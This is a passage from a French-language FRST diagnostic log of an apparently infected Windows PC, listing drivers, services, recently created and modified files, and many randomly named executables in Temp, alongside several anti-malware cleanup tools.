VgaSave; C:\Windows\System32\drivers\vga.sys [29184 2009-07-14] () [Fichier non signé] S3 vhdmp; C:\Windows\system32\drivers\vhdmp.sys [215936 2010-11-21] () [Fichier non signé] S3 viaide; C:\Windows\system32\drivers\viaide.sys [17488 2009-07-14] () [Fichier non signé] S3 VMBusHID; C:\Windows\system32\drivers\VMBusHID.sys [21760 2010-11-21] () [Fichier non signé] R0 volmgr; C:\Windows\System32\drivers\volmgr.sys [71552 2010-11-21] () [Fichier non signé] R0 volmgrx; C:\Windows\System32\drivers\volmgrx.sys [363392 2010-11-21] () [Fichier non signé] R0 volsnap; C:\Windows\System32\drivers\volsnap.sys [296320 2013-07-01] () [Fichier non signé] S3 vsmraid; C:\Windows\system32\drivers\vsmraid.sys [161872 2009-07-14] () [Fichier non signé] S3 vwifibus; C:\Windows\System32\drivers\vwifibus.sys [24576 2009-07-14] () [Fichier non signé] S3 WacomPen; C:\Windows\system32\drivers\wacompen.sys [27776 2009-07-14] () [Fichier non signé] S3 WANARP; C:\Windows\System32\DRIVERS\wanarp.sys [88576 2010-11-21] () [Fichier non signé] R1 Wanarpv6; C:\Windows\System32\DRIVERS\wanarp.sys [88576 2010-11-21] () [Fichier non signé] S3 Wd; C:\Windows\system32\drivers\wd.sys [21056 2009-07-14] () [Fichier non signé] R0 Wdf01000; C:\Windows\System32\drivers\Wdf01000.sys [785624 2015-10-09] () [Fichier non signé] S3 WIMMount; C:\Windows\System32\drivers\wimmount.sys [22096 2009-07-14] () [Fichier non signé] U5 24ca7e6b7f2b5486; <==== ATTENTION: Service verrouillé S3 BstHdDrv; \??\C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [X] S3 BstkDrv; \??\C:\Program Files (x86)\BlueStacks\BstkDrv.sys [X] U2 CWASRE; pas de ImagePath S3 iSafeKrnlBoot; system32\DRIVERS\iSafeKrnlBoot.sys [X] <==== ATTENTION S1 iSafeNetFilter; system32\drivers\iSafeNetFilter.sys [X] <==== ATTENTION S1 LanmaMaster; \??\C:\Windows\system32\drivers\lanmamaster.sys [X] <==== ATTENTION U3 McMPFSvc; pas de ImagePath U2 snare; pas de ImagePath S2 uxstyle; \??\C:\Windows\system32\Drivers\uxstyle.sys [X] ==================== NetSvcs (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) ==================== Un mois - Créés - fichiers et dossiers ======== (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 2017-12-31 10:41 - 2017-12-31 10:49 - 000053979 _____ C:\Users\BOB\Desktop\FRST.txt 2017-12-31 10:40 - 2017-12-31 10:41 - 000000000 ____D C:\FRST 2017-12-31 10:40 - 2017-12-31 10:40 - 002391552 _____ (Farbar) C:\Users\BOB\Desktop\FRST64.exe 2017-12-30 16:24 - 2017-12-30 16:24 - 000000222 _____ C:\Users\BOB\Desktop\DRAGON BALL XENOVERSE 2.url 2017-12-29 16:33 - 2017-12-29 16:33 - 000000222 _____ C:\Users\BOB\Desktop\Overcooked.url 2017-12-29 15:35 - 2017-12-29 15:40 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\24227431.sys 2017-12-29 15:34 - 2017-12-29 15:35 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\216752DE.sys 2017-12-29 15:34 - 2017-12-29 15:34 - 000000000 ____D C:\Users\steam\mbar 2017-12-29 15:34 - 2017-12-29 15:34 - 000000000 ____D C:\Users\steam 2017-12-29 15:33 - 2017-12-29 15:33 - 014178840 _____ (Malwarebytes Corp.) C:\Users\BOB\Desktop\mbar-1.10.3.1001.exe 2017-12-29 11:55 - 2017-12-29 16:43 - 000000512 _____ C:\Windows\system32\LBA-0-976771120-k 2017-12-29 11:42 - 2017-12-31 10:34 - 000193968 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys 2017-12-29 11:42 - 2017-12-30 20:32 - 000046008 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys 2017-12-29 11:42 - 2017-12-30 20:23 - 000253880 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys 2017-12-29 11:41 - 2017-12-29 11:41 - 000001829 _____ C:\Users\Public\Desktop\Malwarebytes.lnk 2017-12-29 11:41 - 2017-12-29 11:41 - 000000000 ____D C:\Program Files\Malwarebytes 2017-12-29 11:41 - 2017-11-29 09:11 - 000077432 _____ C:\Windows\system32\Drivers\mbae64.sys 2017-12-29 11:40 - 2017-12-29 11:41 - 083316440 _____ (Malwarebytes ) C:\Users\BOB\Desktop\mb3-setup-35891.35891-3.3.1.2183-1.0.262-1.0.3374.exe 2017-12-29 10:55 - 2017-12-29 10:55 - 000021751 _____ C:\Users\BOB\Desktop\ZHPCleaner2.txt 2017-12-29 10:46 - 2017-12-29 10:50 - 000021748 _____ C:\Users\BOB\Desktop\ZHPCleaner.txt 2017-12-29 10:17 - 2017-12-29 10:17 - 000000000 ____D C:\Users\Public\Documents\XMUpdate 2017-12-29 10:14 - 2017-12-29 10:14 - 002999168 _____ C:\Users\BOB\Desktop\ZHPCleaner.exe 2017-12-29 10:14 - 2017-12-29 10:14 - 000000837 _____ C:\Users\BOB\Desktop\ZHPCleaner.lnk 2017-12-29 10:10 - 2017-12-31 10:41 - 000000276 _____ C:\Users\Public\Documents\temp.dat 2017-12-29 10:10 - 2017-12-29 10:10 - 000030208 _____ C:\Users\BOB\Desktop\AdwCleaner[C0].txt 2017-12-29 10:07 - 2017-12-29 10:07 - 000000000 ____D C:\Windows\system32\sstmp 2017-12-29 09:53 - 2017-12-29 10:05 - 000000000 ____D C:\AdwCleaner 2017-12-29 09:52 - 2017-12-29 09:52 - 008198432 _____ (Malwarebytes) C:\Users\BOB\Downloads\adwcleaner_7.0.6.0.exe 2017-12-29 09:52 - 2017-12-29 09:52 - 008198432 _____ (Malwarebytes) C:\Users\BOB\Desktop\adwcleaner_7.0.6.0.exe 2017-12-29 00:19 - 2017-12-29 00:19 - 000000000 ____D C:\Users\BOB\AppData\LocalLow\WeirdBeard 2017-12-29 00:18 - 2017-12-29 00:18 - 000000222 _____ C:\Users\BOB\Desktop\Tricky Towers.url 2017-12-28 21:22 - 2017-12-28 21:22 - 000000000 ____D C:\Users\BOB\Desktop\Quarantine 2017-12-28 21:21 - 2017-12-28 21:21 - 000000000 ____D C:\Users\BOB\Downloads\Quarantine 2017-12-28 20:32 - 2017-12-28 20:32 - 003061760 _____ (Nicolas Coolman) C:\Users\BOB\Desktop\ZHPFix.exe 2017-12-28 19:58 - 2017-12-28 19:58 - 000000000 ____D C:\Users\BOB\AppData\Roaming\EasyAntiCheat 2017-12-28 19:58 - 2017-12-28 19:58 - 000000000 ____D C:\Program Files (x86)\EasyAntiCheat 2017-12-27 17:06 - 2017-12-27 17:06 - 000000000 ____D C:\Users\BOB\AppData\Local\My Games 2017-12-27 13:50 - 2017-12-27 13:50 - 000000220 _____ C:\Users\BOB\Desktop\Sid Meier's Civilization V.url 2017-12-27 13:28 - 2017-12-27 13:28 - 000264760 _____ C:\Users\BOB\Desktop\ZHPDiag.txt 2017-12-27 13:15 - 2017-12-29 10:50 - 000000000 ____D C:\Users\BOB\AppData\Roaming\ZHP 2017-12-27 13:15 - 2017-12-29 10:14 - 000000000 ____D C:\Users\BOB\AppData\Local\ZHP 2017-12-27 13:15 - 2017-12-27 13:15 - 000000827 _____ C:\Users\BOB\Desktop\ZHPDiag.lnk 2017-12-27 13:13 - 2017-12-27 13:15 - 002955136 _____ C:\Users\BOB\Downloads\ZHPDiag3.exe 2017-12-27 13:08 - 2017-12-27 13:08 - 006654960 _____ (AVAST Software) C:\Users\Public\Desktop\avast_free_antivirus_setup_online.exe 2017-12-27 13:08 - 2017-12-27 13:08 - 006654960 _____ (AVAST Software) C:\Users\BOB\Downloads\avast_free_antivirus_setup_online.exe 2017-12-27 12:34 - 2017-12-27 13:01 - 000000000 ____D C:\Users\BOB\AppData\Local\AvgSetupLog 2017-12-27 12:34 - 2017-12-27 12:34 - 000000000 ____D C:\Users\BOB\AppData\Local\Avg 2017-12-26 21:02 - 2017-12-26 21:02 - 000000000 ____D C:\Users\BOB\Desktop\tout gamedata 2017-12-23 15:45 - 2017-12-23 15:45 - 000048665 _____ C:\Users\BOB\Downloads\HubEssentials.jar 2017-12-23 15:42 - 2017-12-23 15:42 - 000136410 _____ C:\Users\BOB\Downloads\EssentialsXGroupManager-2.0.1.jar 2017-12-23 13:16 - 2017-12-23 13:16 - 001129816 _____ (Google Inc.) C:\Users\BOB\Downloads\ChromeSetup.exe 2017-12-23 10:47 - 2017-12-23 10:51 - 163057941 _____ C:\Users\BOB\Downloads\Forgotten Memories Pack.zip 2017-12-21 17:47 - 2017-12-21 17:47 - 000000000 ___HD C:\Users\BOB\AppData\Local\319ef92251a8e9ae 2017-12-20 19:49 - 2017-12-20 19:49 - 000000000 ____D C:\Users\BOB\AppData\LocalLow\YandereDev 2017-12-20 19:44 - 2017-12-19 12:57 - 018176512 _____ C:\Users\BOB\Desktop\Yandere Simulator.exe 2017-12-20 18:56 - 2017-12-20 19:35 - 874676772 _____ C:\Users\BOB\Downloads\YandereSimulator (1).zip.crdownload 2017-12-20 18:55 - 2017-12-20 19:30 - 956186915 _____ C:\Users\BOB\Downloads\YandereSimulator.zip 2017-12-20 18:47 - 2017-12-31 10:47 - 000000266 _____ C:\Windows\Tasks\{62F5E116-EF29-E68A-F8C5-7A32657465E8}.job 2017-12-20 18:47 - 2017-12-21 17:47 - 000000000 ____D C:\Users\BOB\AppData\Roaming\62F5E116-EF29-E68A-F8C5-7A32657465E8 2017-12-20 18:47 - 2017-12-20 18:47 - 000003212 _____ C:\Windows\System32\Tasks\{62F5E116-EF29-E68A-F8C5-7A32657465E8} 2017-12-20 18:10 - 2017-12-20 18:10 - 000000000 ____D C:\Users\BOB\AppData\Local\Creepy_Simulator 2017-12-19 12:57 - 2017-12-25 16:29 - 000000000 ____D C:\Users\BOB\Desktop\YandereSimulator_Data 2017-12-18 19:06 - 2017-12-18 19:06 - 002091266 _____ C:\Users\BOB\Downloads\OptiFine_1.10.2_HD_U_E3.jar 2017-12-18 19:05 - 2017-12-18 19:05 - 002040995 _____ C:\Users\BOB\Downloads\OptiFine_1.10.2_HD_U_D8.jar 2017-12-18 19:05 - 2017-12-18 19:05 - 002040995 _____ C:\Users\BOB\Downloads\OptiFine_1.10.2_HD_U_D8 (1).jar 2017-12-18 19:04 - 2017-12-18 19:05 - 000915035 _____ C:\Users\BOB\Downloads\missing_pieces-1.10.2-4.3.0 (1).jar 2017-12-18 19:04 - 2017-12-18 19:04 - 000915035 _____ C:\Users\BOB\Downloads\Non confirmé 949138.crdownload 2017-12-18 19:03 - 2017-12-18 19:04 - 000915035 _____ C:\Users\BOB\Downloads\missing_pieces-1.10.2-4.3.0.jar 2017-12-18 17:19 - 2017-12-18 17:19 - 000465086 _____ C:\Users\BOB\Downloads\Dooglamoo-Painter-Mod-1.10.2.jar 2017-12-18 17:18 - 2017-12-18 17:18 - 000732322 _____ C:\Users\BOB\Downloads\missing_pieces-1.10.2-4.1.3.jar 2017-12-18 17:16 - 2017-12-18 17:17 - 000064287 _____ C:\Users\BOB\Downloads\JustFashion-1.10.2-0.0.1.0 (1).jar 2017-12-18 17:15 - 2017-12-18 17:17 - 000064287 _____ C:\Users\BOB\Downloads\Just-Fashion-Mod-1.10.2.jar 2017-12-18 17:15 - 2017-12-18 17:17 - 000064287 _____ C:\Users\BOB\Downloads\Just-Fashion-Mod-1.10.2 (5).jar 2017-12-18 17:15 - 2017-12-18 17:17 - 000064287 _____ C:\Users\BOB\Downloads\Just-Fashion-Mod-1.10.2 (4).jar 2017-12-18 17:15 - 2017-12-18 17:17 - 000064287 _____ C:\Users\BOB\Downloads\Just-Fashion-Mod-1.10.2 (3).jar 2017-12-18 17:15 - 2017-12-18 17:17 - 000064287 _____ C:\Users\BOB\Downloads\Just-Fashion-Mod-1.10.2 (2).jar 2017-12-18 17:15 - 2017-12-18 17:17 - 000064287 _____ C:\Users\BOB\Downloads\Just-Fashion-Mod-1.10.2 (1).jar 2017-12-18 17:15 - 2017-12-18 17:17 - 000042535 _____ C:\Users\BOB\Downloads\Just-Fashion-Resource-Pack-1.10.2.zip 2017-12-18 17:14 - 2017-12-18 17:14 - 000025095 _____ C:\Users\BOB\Downloads\SubLib-1.10.2.jar 2017-12-14 17:14 - 2017-12-17 14:44 - 000000068 _____ C:\Users\BOB\AppData\Local\0gzi1h0gzi 2017-12-13 19:44 - 2017-12-14 20:43 - 000000052 _____ C:\Users\BOB\AppData\Local\iDShCRgBQf 2017-12-13 18:42 - 2017-12-13 18:43 - 032145408 _____ C:\Users\BOB\Downloads\EpicInstaller-6.10.0-fortnite-96dfb570ebfc474b9a7adf629c2c153a.msi 2017-12-12 10:28 - 2017-12-13 18:26 - 000000000 ___HD C:\Users\BOB\AppData\Local\455b2ddb3151974e 2017-12-10 15:29 - 2017-12-10 15:09 - 001688493 _____ C:\Users\BOB\Desktop\persistent.txt 2017-12-04 19:08 - 2017-12-04 19:08 - 000000000 ____D C:\Users\BOB\Desktop\Jules_Kerman_ATV__Ariane_5._LonesomeRobots_Aerospace-1.1 2017-12-02 11:47 - 2017-12-02 11:47 - 000000000 ____D C:\Users\BOB\AppData\Roaming\.Paladium ==================== Un mois - Modifiés - fichiers et dossiers ======== (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 2017-12-31 10:48 - 2017-01-29 16:02 - 000000000 ____D C:\Users\BOB\AppData\Local\CrashDumps 2017-12-31 10:44 - 2017-05-27 20:43 - 000000250 _____ C:\Windows\Tasks\{78936311-0D14-7460-6062-6A5494772FF1}.job 2017-12-31 10:43 - 2016-09-28 13:43 - 000000266 _____ C:\Windows\Tasks\{7156B350-1B5E-E8E9-33A9-259CC50E6446}.job 2017-12-31 10:43 - 2015-10-08 10:39 - 000000000 ____D C:\Program Files (x86)\Dell Backup and Recovery 2017-12-31 10:42 - 2016-09-28 13:42 - 000000266 _____ C:\Windows\Tasks\Opera_helper.job 2017-12-31 10:38 - 2017-08-09 15:58 - 000000000 ____H C:\Users\BOB\AppData\Roaming\winmgr.txt 2017-12-31 10:33 - 2017-04-01 21:24 - 000625272 _____ C:\Windows\system32\NetUtils2016.dll 2017-12-31 10:33 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT 2017-12-30 20:35 - 2017-10-14 19:33 - 000000000 ____D C:\Program Files (x86)\Steam 2017-12-30 20:32 - 2017-06-18 16:33 - 000000000 ____D C:\Windows\Minidump 2017-12-30 20:22 - 2017-10-01 10:55 - 743180816 _____ C:\Windows\MEMORY.DMP 2017-12-30 18:23 - 2015-10-09 00:13 - 000748358 _____ C:\Windows\system32\perfh00C.dat 2017-12-30 18:23 - 2015-10-09 00:13 - 000150380 _____ C:\Windows\system32\perfc00C.dat 2017-12-30 18:23 - 2009-07-14 06:13 - 001671678 _____ C:\Windows\system32\PerfStringBackup.INI 2017-12-30 18:23 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf 2017-12-29 19:27 - 2017-04-25 19:30 - 000003948 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{86396540-7E39-46A3-B15C-9DDC8C06DFAD} 2017-12-29 11:04 - 2016-09-04 15:35 - 000000000 ____D C:\Users\BOB\AppData\Roaming\Skype 2017-12-29 10:48 - 2017-04-07 11:35 - 000000000 ____D C:\Users\BOB\AppData\Local\AMD 2017-12-29 10:48 - 2017-04-05 11:01 - 000000000 ____D C:\Program Files (x86)\MIO 2017-12-29 10:48 - 2017-03-02 17:12 - 000000000 ____D C:\Program Files (x86)\Wufospromigh Core 2017-12-29 10:48 - 2016-09-04 13:40 - 000000000 ____D C:\Users\BOB\AppData\Local\Google 2017-12-29 10:13 - 2017-04-29 10:39 - 000000000 ____D C:\Users\BOB\AppData\LocalLow\Mozilla 2017-12-29 10:05 - 2017-08-09 14:50 - 000000000 ____D C:\Windows\System32\Tasks\System 2017-12-29 10:05 - 2017-03-11 08:29 - 000000000 ____D C:\Windows\system32\log 2017-12-29 00:44 - 2016-09-25 18:06 - 000000533 _____ C:\Users\BOB\AppData\Roaming\WB.CFG 2017-12-28 22:06 - 2017-05-01 17:00 - 000000000 ____D C:\Program Files (x86)\Google 2017-12-28 21:27 - 2017-09-30 17:18 - 000000000 ____D C:\Users\BOB\AppData\Roaming\BitTorrent 2017-12-28 17:06 - 2017-11-26 13:12 - 000000000 ____D C:\Users\BOB\AppData\Roaming\FileZilla 2017-12-28 16:25 - 2017-11-26 13:12 - 000000000 ____D C:\Users\BOB\AppData\Local\FileZilla 2017-12-28 10:48 - 2009-07-14 05:45 - 000031312 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2017-12-28 10:48 - 2009-07-14 05:45 - 000031312 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2017-12-28 10:31 - 2017-06-12 17:56 - 000000000 ___RD C:\Program Files (x86)\Skype 2017-12-28 10:16 - 2009-07-14 06:08 - 000032482 _____ C:\Windows\Tasks\SCHEDLGU.TXT 2017-12-27 17:06 - 2017-05-10 19:35 - 000000000 ____D C:\Users\BOB\Documents\My Games 2017-12-27 13:29 - 2017-04-23 09:28 - 000000122 _____ C:\Windows\SysWOW64\data 2017-12-26 20:20 - 2017-10-10 12:39 - 000001355 _____ C:\Users\BOB\Desktop\nativelog.txt 2017-12-26 19:41 - 2016-09-04 18:40 - 000000000 ____D C:\Users\BOB\AppData\Roaming\.minecraft 2017-12-25 16:32 - 2016-11-06 14:56 - 000000000 ____D C:\Users\BOB\AppData\Roaming\.deathfightV4 2017-12-23 14:05 - 2017-01-07 22:27 - 000000000 ___RD C:\Users\BOB\Desktop\Bureau 2017-12-23 14:01 - 2017-10-21 11:17 - 000001355 _____ C:\Windows\SysWOW64\nativelog.txt 2017-12-23 10:52 - 2017-10-21 10:59 - 000000000 ____D C:\Users\BOB\Desktop\Test 1 2 1 2 2017-12-20 18:49 - 2017-06-07 15:11 - 000000000 ____D C:\Users\BOB\AppData\Local\{9D7FAB23-B9D7-C79B-D44F-E273F0271EEB} 2017-12-09 11:01 - 2017-11-20 18:25 - 000000000 ____D C:\Users\BOB\Desktop\Nouveau dossier ==================== Fichiers à la racine de certains dossiers ======= 2017-08-09 17:26 - 2017-08-09 17:26 - 038289408 ____H (Sharp ) C:\Users\BOB\cyjdsnyr.exe 2017-08-10 12:51 - 2017-08-10 12:51 - 039227392 ____H (Sharp ) C:\Users\BOB\hdoixsdw.exe 2017-08-10 10:27 - 2017-08-10 10:27 - 036003840 ____H (Sharp ) C:\Users\BOB\kgrlavgz.exe 2017-08-11 08:08 - 2017-09-13 13:26 - 000000000 ____H () C:\Users\BOB\lhsmbwha.exe 2017-08-10 13:11 - 2017-08-10 13:11 - 052056064 ____H (Sharp ) C:\Users\BOB\mitncxib.exe 2017-08-10 08:29 - 2017-08-10 08:29 - 038666240 ____H (Sharp ) C:\Users\BOB\rnyshcng.exe 2017-08-09 14:53 - 2017-08-09 14:53 - 042418176 ____H (Sharp ) C:\Users\BOB\umxpoaht.exe 2017-04-06 15:59 - 2017-04-06 16:00 - 004096000 _____ () C:\Program Files (x86)\GUT3F23.tmp 2017-04-02 20:38 - 2017-08-10 17:07 - 000000132 _____ () C:\Users\BOB\AppData\Roaming\Adobe PNG Format CS5 Prefs 2016-11-04 19:18 - 2016-11-04 19:18 - 000000407 _____ () C:\Users\BOB\AppData\Roaming\AdobeWLCMR2Cache.dat 2017-08-30 15:33 - 2017-08-30 15:33 - 000058368 _____ () C:\Users\BOB\AppData\Roaming\bs.dll 2017-04-01 21:58 - 2017-04-01 21:58 - 001895381 _____ () C:\Users\BOB\AppData\Roaming\Dongolax.bin 2017-04-01 21:57 - 2017-04-01 21:57 - 001893336 _____ () C:\Users\BOB\AppData\Roaming\K-dox.tst 2017-08-30 15:33 - 2017-08-30 15:33 - 000522752 _____ () C:\Users\BOB\AppData\Roaming\sqlite3.dll 2017-05-16 18:17 - 2009-06-10 22:14 - 000087888 _____ (Microsoft Corporation) C:\Users\BOB\AppData\Roaming\svhost.exe 2017-05-13 17:56 - 2017-05-27 21:01 - 000032768 ___SH () C:\Users\BOB\AppData\Roaming\Thumbs.db 2017-05-10 11:30 - 2017-05-10 11:30 - 000027764 _____ () C:\Users\BOB\AppData\Roaming\UserTile.png 2017-04-01 21:58 - 2017-04-01 21:58 - 000136827 _____ () C:\Users\BOB\AppData\Roaming\Ventoflex.bin 2016-09-25 18:06 - 2017-12-29 00:44 - 000000533 _____ () C:\Users\BOB\AppData\Roaming\WB.CFG 2017-08-09 15:58 - 2017-12-31 10:38 - 000000000 ____H () C:\Users\BOB\AppData\Roaming\winmgr.txt 2017-04-01 21:56 - 2017-04-01 21:56 - 000278509 _____ () C:\Users\BOB\AppData\Roaming\ZerKix.bin 2017-08-30 15:33 - 2017-08-30 15:33 - 000712192 _____ () C:\Users\BOB\AppData\Roaming\zs.dll 2017-12-14 17:14 - 2017-12-17 14:44 - 000000068 _____ () C:\Users\BOB\AppData\Local\0gzi1h0gzi 2017-04-26 15:02 - 2017-04-26 15:02 - 000001456 _____ () C:\Users\BOB\AppData\Local\Adobe Enregistrer pour le Web 12.0 Prefs 2017-12-13 19:44 - 2017-12-14 20:43 - 000000052 _____ () C:\Users\BOB\AppData\Local\iDShCRgBQf 2017-11-26 14:29 - 2017-11-26 14:29 - 000000600 _____ () C:\Users\BOB\AppData\Local\PUTTY.RND 2017-02-08 07:49 - 2017-02-08 07:49 - 000000000 _____ () C:\Users\BOB\AppData\Local\{59546956-909D-41A5-A6F6-1B75C4BA87FC} Fichiers à déplacer ou supprimer: ==================== C:\Users\BOB\AppData\Local\Temp\6E3.tmp.exe C:\Windows\Tasks\{62F5E116-EF29-E68A-F8C5-7A32657465E8}.job C:\Windows\Tasks\{7156B350-1B5E-E8E9-33A9-259CC50E6446}.job C:\Windows\Tasks\{78936311-0D14-7460-6062-6A5494772FF1}.job Certains fichiers dans TEMP: ==================== 2017-05-14 17:06 - 2017-05-14 17:06 - 000678056 _____ () C:\Users\BOB\AppData\Local\Temp\10748.exe 2017-05-15 19:04 - 2017-05-15 19:04 - 001674304 _____ () C:\Users\BOB\AppData\Local\Temp\12068.exe 2017-03-02 07:45 - 2017-03-02 07:45 - 000079736 _____ (AppWork GmbH) C:\Users\BOB\AppData\Local\Temp\131329107119091646.exe 2017-03-02 07:45 - 2017-03-02 07:45 - 001793194 _____ ( ) C:\Users\BOB\AppData\Local\Temp\13132910725924966369.exe 2017-03-02 07:46 - 2017-03-02 07:46 - 000079736 _____ (AppWork GmbH) C:\Users\BOB\AppData\Local\Temp\131329107921627549.exe 2017-03-02 07:46 - 2017-03-02 07:46 - 001677234 _____ ( ) C:\Users\BOB\AppData\Local\Temp\13132910793662840750.exe 2017-03-06 17:08 - 2017-03-06 17:11 - 002037096 _____ ( ) C:\Users\BOB\AppData\Local\Temp\1b218f6e-0287-11e7-83d3-64006a22bf67.exe 2017-05-11 19:19 - 2017-05-11 19:19 - 001469296 _____ () C:\Users\BOB\AppData\Local\Temp\23150.exe 2017-05-20 10:42 - 2017-05-20 10:42 - 001819256 _____ () C:\Users\BOB\AppData\Local\Temp\32072.exe 2017-05-16 18:23 - 2017-05-16 18:23 - 000673864 _____ () C:\Users\BOB\AppData\Local\Temp\36135.exe 2017-05-10 11:30 - 2017-05-10 11:30 - 001147160 _____ () C:\Users\BOB\AppData\Local\Temp\37479.exe 2017-05-20 11:12 - 2017-05-20 11:12 - 000718928 _____ () C:\Users\BOB\AppData\Local\Temp\39542.exe 2017-05-13 10:48 - 2017-05-13 10:48 - 001116768 _____ () C:\Users\BOB\AppData\Local\Temp\41252.exe 2017-05-16 18:17 - 2017-05-16 18:17 - 000673864 _____ () C:\Users\BOB\AppData\Local\Temp\50050.exe 2017-08-30 15:33 - 2017-08-30 15:33 - 000223660 _____ () C:\Users\BOB\AppData\Local\Temp\5271.exe 2017-05-17 12:44 - 2017-05-17 12:44 - 001367240 _____ () C:\Users\BOB\AppData\Local\Temp\53058.exe 2017-09-11 16:31 - 2017-09-11 16:31 - 000721920 _____ () C:\Users\BOB\AppData\Local\Temp\61AF.tmp.exe 2017-05-16 17:43 - 2017-05-16 17:43 - 001155944 _____ () C:\Users\BOB\AppData\Local\Temp\69578.exe 2017-09-13 13:26 - 2017-09-13 13:26 - 000312320 _____ () C:\Users\BOB\AppData\Local\Temp\6E3.tmp.exe 2017-08-29 16:43 - 2017-08-29 16:43 - 000517120 _____ () C:\Users\BOB\AppData\Local\Temp\8131.tmp.exe 2017-05-20 10:01 - 2017-05-20 10:01 - 001441864 _____ () C:\Users\BOB\AppData\Local\Temp\81656.exe 2017-05-05 19:39 - 2017-05-05 19:39 - 000000056 _____ () C:\Users\BOB\AppData\Local\Temp\83cf61494e84f4e22ab8c45fdfbd7df6.dll 2017-09-01 09:00 - 2017-09-01 09:00 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\aabyvquibv.exe 2017-08-31 16:11 - 2017-08-31 16:11 - 000000000 _____ () C:\Users\BOB\AppData\Local\Temp\aeotopmdkz.exe 2017-08-30 20:17 - 2017-08-30 20:17 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\atpmkrzxmp.exe 2017-04-29 09:13 - 2003-04-11 06:16 - 003534848 _____ () C:\Users\BOB\AppData\Local\Temp\AutoRunGUI.dll 2017-08-30 09:59 - 2017-08-30 09:59 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\ayzjfyycjo.exe 2017-08-10 10:53 - 2017-08-10 10:53 - 000131072 _____ () C:\Users\BOB\AppData\Local\Temp\azyrcbqkng.exe 2017-08-09 17:18 - 2017-08-09 17:18 - 000131072 _____ () C:\Users\BOB\AppData\Local\Temp\bakmnmlgll.exe 2017-01-26 08:26 - 2017-01-26 08:26 - 004297200 _____ (Bandicam Company) C:\Users\BOB\AppData\Local\Temp\bdfilters.dll 2017-08-10 08:28 - 2017-08-10 08:28 - 000131072 _____ () C:\Users\BOB\AppData\Local\Temp\bgclhvmizr.exe 2017-08-10 08:44 - 2017-08-10 08:44 - 000131072 _____ () C:\Users\BOB\AppData\Local\Temp\bmeabeurwp.exe 2017-09-02 08:56 - 2017-09-02 08:56 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\btiuvvkplc.exe 2017-03-06 17:30 - 2017-03-06 17:30 - 000009216 _____ () C:\Users\BOB\AppData\Local\Temp\c4zv314q.dll 2017-08-31 16:13 - 2017-08-31 16:13 - 000996864 _____ () C:\Users\BOB\AppData\Local\Temp\C773.tmp.exe 2017-08-09 16:35 - 2017-08-09 16:35 - 000131072 _____ () C:\Users\BOB\AppData\Local\Temp\cakzazjpqm.exe 2017-09-04 15:22 - 2017-09-04 15:22 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\cbkadpopbx.exe 2017-09-13 12:44 - 2017-09-13 12:44 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\ccxleznofh.exe 2017-09-04 15:22 - 2017-09-04 15:22 - 000003885 _____ () C:\Users\BOB\AppData\Local\Temp\cfylmodaxu.exe 2017-09-06 13:18 - 2017-09-06 13:18 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\ckayxpnlxr.exe 2017-08-30 20:16 - 2017-08-30 20:16 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\ckboahvail.exe 2017-08-09 16:35 - 2017-08-09 16:35 - 000131072 _____ () C:\Users\BOB\AppData\Local\Temp\clnujqyboo.exe 2017-09-11 15:51 - 2017-09-11 15:51 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\cnyjninfgn.exe 2017-07-11 16:23 - 2017-06-28 11:24 - 004708143 _____ () C:\Users\BOB\AppData\Local\Temp\CommonRes.dll 2017-09-03 06:49 - 2017-09-03 06:49 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\crcsumivoz.exe 2017-09-04 15:42 - 2017-09-04 15:42 - 000000000 _____ () C:\Users\BOB\AppData\Local\Temp\crwpzftoxq.exe 2017-09-02 08:56 - 2017-09-02 08:56 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\cxooyeudsd.exe 2017-09-05 15:57 - 2017-09-05 15:57 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\cyzvalqvpj.exe 2017-08-30 08:57 - 2017-08-30 08:57 - 001167872 _____ () C:\Users\BOB\AppData\Local\Temp\D96.tmp.exe 2017-08-31 10:28 - 2017-08-31 10:28 - 000782336 _____ () C:\Users\BOB\AppData\Local\Temp\dgxuwrwmip.exe 2017-08-29 19:25 - 2017-08-29 19:25 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\dhpkhhqszt.exe 2017-08-30 17:07 - 2017-08-30 17:07 - 000139264 _____ () C:\Users\BOB\AppData\Local\Temp\dqhshtmywo.exe 2017-08-08 17:57 - 2017-08-08 17:57 - 000065536 _____ (Sony DADC Austria AG) C:\Users\BOB\AppData\Local\Temp\drm_dialogs.dll 2017-04-30 14:36 - 2017-08-08 17:57 - 000208896 _____ (Sony DADC Austria AG) C:\Users\BOB\AppData\Local\Temp\drm_dyndata_7410004.dll 2017-08-10 08:42 - 2017-08-10 08:42 - 000131072 _____ () C:\Users\BOB\AppData\Local\Temp\dsswzagltz.exe 2017-09-01 09:00 - 2017-09-01 09:00 - 000673792 _____ () C:\Users\BOB\AppData\Local\Temp\dvygiufibb.exe 2017-08-11 08:01 - 2017-08-11 